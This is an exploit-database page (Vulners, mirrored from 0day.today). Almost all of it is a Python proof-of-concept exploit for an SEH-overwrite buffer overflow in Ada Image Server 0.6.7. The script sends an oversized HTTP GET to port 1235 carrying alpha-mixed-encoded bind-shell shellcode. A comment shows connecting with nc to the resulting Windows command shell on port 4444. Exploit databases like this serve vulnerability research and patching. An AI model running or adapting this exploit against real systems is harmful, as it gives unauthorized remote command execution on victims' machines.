Vulners
Lucene search
Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
====================================================
Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
====================================================
# Title: Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Blake
# Published: 2009-10-07
# Verified: yes
view source
print?
#!/usr/bin/python
# Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe.
# However, it contains a null character in the address (ex: XP SP3 => 00689aff).
# Versions above 0.6.7 do not seem to be vulnerable.
#
# $ ./imgsrv.py 192.168.1.146
#
# [*] Ada Image Server v0.6.6 SEH Overwrite
# [*] Discovered/Exploited by Blake
# [*] Tested on XP SP1
#
# [+] Connecting to 192.168.1.146
# [+] Sending payload
# [+] Payload Sent
#
# $ nc 192.168.1.146 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Imgsvr>
import socket, sys
print "\n[*] Ada Image Server v0.6.6 SEH Overwrite"
print "[*] Discovered/Exploited by Blake"
print "[*] Tested on XP SP1\n"
if len(sys.argv)!= 2:
print "[*] Usage: %s <ip>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = 1235 # default port
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe1\xda\xd5\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x42\x58\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x43\x31"
"\x4a\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4d\x49\x4e\x4c\x4d\x54\x49\x50\x43\x44\x44\x47"
"\x49\x51\x48\x4a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x51\x44\x47\x54\x47\x58\x44\x35\x4a\x45\x4c\x4b\x51\x4f"
"\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x46\x44\x45\x4c\x45\x31\x48\x43\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x50\x43\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x45\x36\x50\x53\x43\x56\x43\x58\x46\x53\x46\x52\x45"
"\x38\x42\x57\x43\x43\x46\x52\x51\x4f\x51\x44\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
"\x56\x51\x4f\x4c\x49\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48"
"\x43\x32\x50\x55\x42\x4a\x43\x32\x4b\x4f\x4e\x30\x45\x38\x48"
"\x59\x43\x39\x4a\x55\x4e\x4d\x46\x37\x4b\x4f\x4e\x36\x51\x43"
"\x51\x43\x51\x43\x51\x43\x51\x43\x51\x53\x51\x43\x50\x43\x50"
"\x53\x4b\x4f\x48\x50\x45\x36\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x51\x43\x4d\x59\x4d\x31\x4a\x35\x43\x58\x4e\x44\x45\x4a\x44"
"\x30\x48\x47\x46\x37\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x50\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4d"
"\x39\x46\x37\x4b\x4f\x4e\x36\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x50\x49\x4c\x46\x50\x49\x46\x37\x4b\x4f\x4e"
"\x36\x50\x50\x51\x44\x50\x54\x50\x55\x4b\x4f\x48\x50\x4a\x33"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x51\x47\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x45\x36\x42\x4a\x43\x54\x43\x56"
"\x42\x48\x42\x43\x42\x4d\x4b\x39\x4b\x55\x42\x4a\x50\x50\x50"
"\x59\x51\x39\x48\x4c\x4c\x49\x4a\x47\x43\x5a\x47\x34\x4b\x39"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47\x32\x46"
"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x50\x38"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x43\x42\x4b\x4e\x4e\x53\x44"
"\x56\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x50\x51\x50"
"\x51\x50\x55\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x4e\x39"
"\x44\x45\x48\x4e\x46\x33\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x50\x57\x4b\x4c\x4b\x33"
"\x49\x54\x42\x44\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x48\x50\x43"
"\x58\x4c\x30\x4c\x4a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41" * 19000 # overwrites seh handler at 19734
nops = "\x90" * 29 # nop sled
sc = shellcode # shellcode - 696 bytes
near_jmp = "\xe9\x44\xfd\xff\xff" # jump back -700 bytes
next_seh = "\xeb\xf9\xff\xff" # jump back -7 bytes
seh = "\x10\xbf\xc1\x77" # c:\windows\system32\msvcrt.dll
junk = "\x43" * 262 # junk buffer
print "[+] Connecting to %s" % host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Could not connect!\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET /" + payload + nops + sc + near_jmp + next_seh + seh + junk + " HTTP/1.0\r\n\r\n")
s.close()
print "[+] Payload Sent\n"
# 0day.today [2018-03-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Oct 2009 00:00Current
7.1High risk
Vulners AI Score7.1